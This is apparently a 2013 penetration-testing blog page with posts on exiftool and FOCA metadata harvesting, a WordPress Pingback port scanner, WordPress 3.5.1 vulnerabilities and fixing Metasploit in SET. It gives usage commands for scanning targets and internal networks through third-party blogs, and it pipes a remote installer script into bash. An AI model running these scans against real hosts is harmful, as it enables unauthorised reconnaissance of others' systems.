If you want to write your own python script then visit our new section of blog script .

Exiftool can extract metadata from images ;documents ,videos etc.Most of file format are supported in exiftool. EXIFTOOL can also write metadata into Documents. So before uploading document remove metadata from it

How to use?
(1)If you are not using backtrack than you can download from git. For ubuntu user type following command in terminal.
git clone https://github.com/pandastream/libimage-exiftool-perl-9.27.git exiftool
sudo apt-get install libarchive-zip-perl

(2)cd exiftool
(3)./exiftool /path of file.

Extract metadata from pdf file:-

./exiftool /path of pdf file

exiftool-metadata

Thursday, July 25, 2013

Wordpress Pingback Port Scanner

0 comments

WordpressPingbackPortScanner

Wordpress exposes a so called Pingback API to link to other blogposts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple Wordpress Blogs exposing this API. This issue was fixed in Wordpress 3.5.1. Older versions are vulnerable, if the XML-RPC Interface is active.

(1)Download from here

(2)Extract it in folder

(3)cd Downloads/WordpressPingbackPortScanner-master/

(4)It does not work default ruby version which is 1.9.2 ; so by running update-alternatives we can change ruby version to 1.8.2
update-alternatives --config ruby
select 1

(5)
gem install bundler
bundle install
wordpress-pingback-port-scanner
 Use:-

Quick-scan a target via a blog:

ruby wppps.rb -t http://www.target.com http://www.myblog.com/

Use multiple blogs to scan a single target:

ruby wppps.rb -t http://www.target.com http://www.myblog1.com/ http://www.myblog2.com/ http://www.myblog3.com/

Scan a free wordpress.com blog (all ports) from the internal network:

ruby wppps.rb -a -t http://localhost http://myblog.wordpress.com/

Tuesday, July 23, 2013

List of vulnerability in wordpress 3.5.1.

0 comments


Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army.
And large amount of Database has been stolen. Now what is common in these sites?
They have word-press 3.5.1 which is vulnerable to some attack.


A weakness and multiple vulnerabilities have been reported in WordPress, which can be exploited by malicious users to disclose certain system information and bypass certain security restrictions and by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of Service).

1) An error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory resources by sending HTTP requests with a specially crafted password cookie.

Successful exploitation of this vulnerability requires knowledge of the URL for a password-protected post.

This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.



Here is full details & exploitation is available ;visit this link.

2) An unspecified error within the HTTP API related to server-side requests can be exploited to gain access to the site.

Here is full details.
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

3) An unspecified error can be exploited to bypass certain restrictions when publishing posts.

Successful exploitation requires the "Contributor" role.

4) An unspecified error can be exploited to reassign the post authorship.

5) Certain input related to SWFUpload is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Sunday, July 21, 2013

How to solve metasploit problem in SET?

0 comments

If you installed metasploit from git repository then you donot face any problem with SET. But If you have installed metasploit from its binary version then when you tried to running social engineering toolkit metasploit attack then might be you get error of some ruby bundle. Here is solution of that problem. I tested on SET Version: 5.2.1 & metasploit v4.6.2-1.

We are going to install Ruby 1.9.3 using RVM. Running all this command in msf3 folder

root@bt:~# cd /opt/metasploit/apps/pro/msf3/

root@bt:/opt/metasploit/apps/pro/msf3# bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) 
 
root@bt:/opt/metasploit/apps/pro/msf3# source /etc/profile.d/rvm.sh
 
root@bt:/opt/metasploit/apps/pro/msf3# rvm -v 

Once RVM is up and running we need to get a couple of libraries that will be required by the Ruby installation:
root@bt:/opt/metasploit/apps/pro/msf3# for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done 

And finally the Ruby 1.9.3 runtime: 

root@bt:/opt/metasploit/apps/pro/msf3# rvm install 1.9.3
root@bt:/opt/metasploit/apps/pro/msf3# rvm 1.9.3 --default
root@bt:/opt/metasploit/apps/pro/msf3# ruby -v
root@bt:/opt/metasploit/apps/pro/msf3# gem install bundler
root@bt:/opt/metasploit/apps/pro/msf3# bundle install

Now open set from its path ; before running set type command like below
cd /pentest/exploits/set

source /etc/profile.d/rvm.sh

rvm 1.9.3 –default

./se-toolkit

Now you can use any metasploit attack from SET .

Thursday, July 18, 2013

Information Gathering Using FOCA

1 comments
Last month I put some of tutorial on Information gathering which is first step of penetration testing  , & today we will go ahead in this series . As you know Backtrack has all tools for penetration testing , but this tool is not come with backtrack ; It`s very powerful  tool for information gathering and its name is FOCA (Fingerprinting Organizations with Collected Ar­chieves). It is windows based  tool ; you can install it in linux with help of wine. But i used it in windows  , you can find here “how to install foca inbacktrack?


What kind of data can be found? 

•Metadata:
–Information stored to give information about the document.
•For example: Creator, Organization, etc..
•Hidden information:
–Information internally stored by programs and not editable.
•For example: Template paths, Printers, db structure, etc…
•Lost data:
–Information which is in documents due to human mistakes or negligence, because it was not intended to be there.
•For example: Links to internal servers, data hidden by format, etc…

Download:-

(1)Go to official website here.
(2)Enter your valid email address at end of page & you will receive email which contain Download link.
(3)Install Foca by running setup.

Sample Example of FOCA:-

(1)Open foca click on create new project.
(2)Enter project name & domain name & click on create.


(3)On right side you can see different file types which will be searching in given domain. Select which file type you want to search &  click on search.

(4)As you can see in above image ; it will find different files from domain using google & bing search engine.

UA-35960349-1